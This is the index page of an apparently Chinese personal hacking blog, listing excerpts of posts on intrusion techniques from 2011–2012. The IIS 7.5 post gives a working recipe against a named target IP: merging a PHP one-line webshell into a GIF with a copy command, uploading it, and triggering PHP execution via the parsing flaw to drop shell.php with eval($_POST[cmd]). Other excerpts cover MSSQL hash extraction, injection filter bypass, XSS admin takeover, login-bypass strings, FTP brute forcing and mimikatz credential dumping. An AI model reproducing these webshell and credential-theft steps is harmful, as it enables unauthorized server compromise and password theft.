欺天

NLP | HACK | 社会工程学 | 金融


没有版权 尽情转载

08年 到2011年10月1日的博文 由于意外全部没了。是预示着重生吗?是的,一定是的、

Read more…?


Published by 欺天, on 十月 2nd, 2011 at 12:11 下午. Filled under: 一路以来的足迹. | No Comments |

mysql hash 破解提权

mssql的hash保存在表master.dbo.sysxlogins中,用

select name,password from master.dbo.sysxlogins
可以提取用户hash
Read more…?


Published by 欺天, on 八月 7th, 2012 at 1:17 下午. Filled under: hack. | No Comments |

IIS7.5解析漏洞

目标站:http://www.XXXX.com/
目标IP 14.1.20.105
服务器系统 Microsoft-IIS/7.5
环境平台 ASP.NET
这个站是IIS7.5的  拿站过程就不写了 直接讲进入后台
准备一个txt 写进我们的asp一句话 还有随便的一张图片
然后 DOS合并:copy X.gif /b + X.txt/a X.gif
生成X.gif   然后在后台上传合成的图片
代码为:

  1. <?PHP fputs(fopen(’shell.php’,’w’),’<?php eval($_POST[cmd])?>’);?>

复制代码

意思是在目录下生成 shell.php 密码为 cmd的一句话。
得到了http://www.XXXX.com/Upload/Uploadfile/images/x.gif是我们图片的地址
然后在地址后面加个1.php 会以php方式执行,类似于nuix的解析漏洞,空字节%00.php也可以执行
http://www.XXXX.com/Upload/Uploadfile/images/x.gif/1.php在浏览器中运行   它会以php方式执行
然后会在目录下生成
http://www.XXXX.com/Upload/Uploadfile/images/shell.php它就是我们的一句话木马地址


Published by 欺天, on 七月 23rd, 2012 at 12:45 下午. Filled under: hack. | No Comments |

webshell生僻脚本ashx和stm,shtm,shtml

当上传功能几乎禁掉了所有能被解析执行的服务器端脚本文件时别忘了下面这两个脚本,这也不是我原创的,每次搜索引擎查太麻烦,索性贴在自己博客里面。
第一个是ashx脚本,服务器有.net环境但aspx被禁止上传时适用。这个执行后会在当前目录下生成Neeke.asp一句话木马,也可以写入其它文件,你懂的。
Read more…?


Published by 欺天, on 七月 8th, 2012 at 3:07 上午. Filled under: hack. | No Comments |

域名转出 转入相关

前提: 你的域名必须符合规定的允许转出的条件,比如离注册或续费时间 60 天以上,离到期时间 30 天以上。 步骤: 如果你要转出,先联系原来的国内域名注册服务商,要求转出。 如果域名注册服务商拒绝,或要求你交手续费,或用其他方式阻拦或给你增加门槛,好,不需要继续跟他们联系。
Read more…?


Published by 欺天, on 六月 26th, 2012 at 7:56 下午. Filled under: 未分类. | No Comments |

Brutus之ftp密码破解教程

Brutus之ftp密码破解教程

Brutust是英国的Hoobie公司出的一款功能很强大的密码破解工具,官方网站是www.hoobie.net.这里我们将介绍用它来破解ftp
密码。
Let’s go!!!!
介绍一下界面
Read more…?


Published by 欺天, on 五月 19th, 2012 at 10:18 上午. Filled under: hack. Tags: | No Comments |

突破防注入

 

标题:防注入真的有用吗?

 

内容:

 

现在网上流传很多防注入代码。这些真的有用吗?这是在网上找的一个防注入代码
Read more…?


Published by 欺天, on 五月 17th, 2012 at 4:18 下午. Filled under: hack. | No Comments |

MYSQL注入点判断

有时候我们注入的时候很难用and 1=1和 and 1=2来判断是否存在注入。。特别是像宽字节注入这种。。就比如说搜索型注入吧。。当存在宽字节注入时我们加上了%d5这样的。。数据库是查不到的。
Read more…?


Published by 欺天, on 五月 17th, 2012 at 4:13 下午. Filled under: hack. Tags: | No Comments |

XSS入侵

一般发现一个xss漏洞后要做的基本上就是这些:

1. 伪造请求 使用$_REQUEST或$_GET
首先我们要找找该网站使用的程序是不是在网上能找到源码,如果能找到源码的话,就去分析后台管理员更改密码或者增加管理员的页面,然后分析管理员使用的是不是$_REQUEST接收参数,如果是的话,我们使用该XSS漏洞构造一个请求,比如前台发表留言中可以使用HTML代码,那么我们就嵌入一个IMG元素:

Published by 欺天, on 五月 15th, 2012 at 12:40 下午. Filled under: hack. | No Comments |

asp、aspx、php、jsp万能密码大全

asp aspx万能密码 备用
Read more…?


Published by 欺天, on 四月 29th, 2012 at 10:55 上午. Filled under: hack. | No Comments |

轻量级调试器神器 – mimikatz – 直接抓取 Windows 明文密码!

昨天有朋友发了个法国佬写的神器叫 mimikatz 让我们看下

神器下载地址:

http://blog.gentilkiwi.com/mimikatz

还有一篇用这个神器直接从 lsass.exe 里获取windows处于active状态账号明文密码的文章

http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from-lsass

自己尝试了下用 win2008 r2 x64 来测试
Read more…?


Published by 欺天, on 四月 7th, 2012 at 11:05 上午. Filled under: hack. | No Comments |